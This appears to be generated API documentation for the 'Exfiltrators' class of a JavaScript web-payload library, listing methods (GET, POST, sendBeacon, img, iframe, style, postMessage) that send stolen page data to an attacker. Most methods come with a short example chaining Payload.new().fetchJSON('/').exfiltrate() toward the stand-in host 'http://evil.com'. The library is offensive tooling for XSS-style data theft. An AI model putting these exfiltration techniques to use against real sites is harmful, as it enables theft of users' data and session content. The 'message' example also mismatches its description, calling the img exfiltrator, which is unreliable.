Exfiltrators

Exfiltrators

Collection of exfiltrators

Members

Methods

Constructor

Exfiltrators.js:20

new Exfiltrators()

Methods

Exfiltrators.js:103

(static) console(prefixopt) → {Payload}

Create a debugging exfiltrator that log to the console.

Example
const exfiltrator = Exfiltrator.console()
const p = Payload.new()
              .setExfiltrator(exfiltrator)
              .fetchJSON("/")
              .exfiltrate()
Parameters
Name Type Attributes Default Description
prefix string <optional>
 null

Prefix to add to console.log call
Returns

The exfiltrator function to use with setExfiltrator and addExfiltrator.

Type
Payload
Exfiltrators.js:34

(static) get(url, paramNameopt) → {Payload}

Create an exfiltrator using fetch with GET request, the data is stringified as JSON and converted to base64 before exfiltration.

Example
const exfiltrator = Exfiltrator.get("http://evil.com")
const p = Payload.new()
              .setExfiltrator(exfiltrator)
              .fetchJSON("/")
              .exfiltrate()
Parameters
Name Type Attributes Default Description
url string

Url to use for exfiltration
paramName string <optional>
 "data"

name of the parameter that must contain the exfiltrated data.
Returns

The exfiltrator function to use with setExfiltrator and addExfiltrator.

Type
Payload
Exfiltrators.js:173

(static) iframe(url, paramNameopt) → {Payload}

Create an exfiltrator using <iframe> element to perform GET request, the data is stringified as JSON and converted to base64 before exfiltration.

Example
const exfiltrator = Exfiltrator.iframe("http://evil.com")
const p = Payload.new()
              .setExfiltrator(exfiltrator)
              .fetchJSON("/")
              .exfiltrate()
Parameters
Name Type Attributes Default Description
url string

Url to use for exfiltration
paramName string <optional>
 "data"

name of the parameter that must contain the exfiltrated data.
Returns

The exfiltrator function to use with setExfiltrator and addExfiltrator.

Type
Payload
Exfiltrators.js:125

(static) img(url, paramNameopt) → {Payload}

Create an exfiltrator using <img> element to perform GET request, the data is stringified as JSON and converted to base64 before exfiltration.

Example
const exfiltrator = Exfiltrator.img("http://evil.com")
const p = Payload.new()
              .setExfiltrator(exfiltrator)
              .fetchJSON("/")
              .exfiltrate()
Parameters
Name Type Attributes Default Description
url string

Url to use for exfiltration
paramName string <optional>
 "data"

name of the parameter that must contain the exfiltrated data.
Returns

The exfiltrator function to use with setExfiltrator and addExfiltrator.

Type
Payload
Exfiltrators.js:197

(static) message(nameopt, targetopt) → {Payload}

Create an exfiltrator using window.postMessage, the data is stringified as JSON before exfiltration.

Example
const exfiltrator = Exfiltrator.img("http://evil.com")
const p = Payload.new()
              .setExfiltrator(exfiltrator)
              .fetchJSON("/")
              .exfiltrate()
Parameters
Name Type Attributes Default Description
name string <optional>
 "top"

Name of the targeted frame
target string <optional>
 "*"

Target for the message
Returns

The exfiltrator function to use with setExfiltrator and addExfiltrator.

Type
Payload
Exfiltrators.js:53

(static) post(url, paramNameopt) → {Payload}

Create an exfiltrator using fetch with POST request, the data is stringified as JSON before exfiltration.

Example
const exfiltrator = Exfiltrator.post("http://evil.com")
const p = Payload.new()
              .setExfiltrator(exfiltrator)
              .fetchJSON("/")
              .exfiltrate()
Parameters
Name Type Attributes Default Description
url string

Url to use for exfiltration
paramName string <optional>
 "data"

name of the parameter that must contain the exfiltrated data.
Returns

The exfiltrator function to use with setExfiltrator and addExfiltrator.

Type
Payload
Exfiltrators.js:71

(static) postJSON(url) → {Payload}

Create an exfiltrator using fetch with POST JSON request, the data is stringified as JSON before exfiltration.

Since it's not possible to set the content-type as application/json for cross domain requests, the content-type is set as text/plain.

Example
const exfiltrator = Exfiltrator.postJSON("http://evil.com")
const p = Payload.new()
              .setExfiltrator(exfiltrator)
              .fetchJSON("/")
              .exfiltrate()
Parameters
Name Type Description
url string

Url to use for exfiltration
Returns

The exfiltrator function to use with setExfiltrator and addExfiltrator.

Type
Payload
Exfiltrators.js:87

(static) sendBeacon(url) → {Payload}

Create an exfiltrator using navigator.sendBeacon, the data is stringified as JSON before exfiltration.

Example
const exfiltrator = Exfiltrator.sendBeacon("http://evil.com")
const p = Payload.new()
              .setExfiltrator(exfiltrator)
              .fetchJSON("/")
              .exfiltrate()
Parameters
Name Type Description
url string

Url to use for exfiltration
Returns

The exfiltrator function to use with setExfiltrator and addExfiltrator.

Type
Payload
Exfiltrators.js:149

(static) style(url, paramNameopt) → {Payload}

Create an exfiltrator using <style> element to perform GET request, the data is stringified as JSON and converted to base64 before exfiltration.

Example
const exfiltrator = Exfiltrator.style("http://evil.com")
const p = Payload.new()
              .setExfiltrator(exfiltrator)
              .fetchJSON("/")
              .exfiltrate()
Parameters
Name Type Attributes Default Description
url string

Url to use for exfiltration
paramName string <optional>
 "data"

name of the parameter that must contain the exfiltrated data.
Returns

The exfiltrator function to use with setExfiltrator and addExfiltrator.

Type
Payload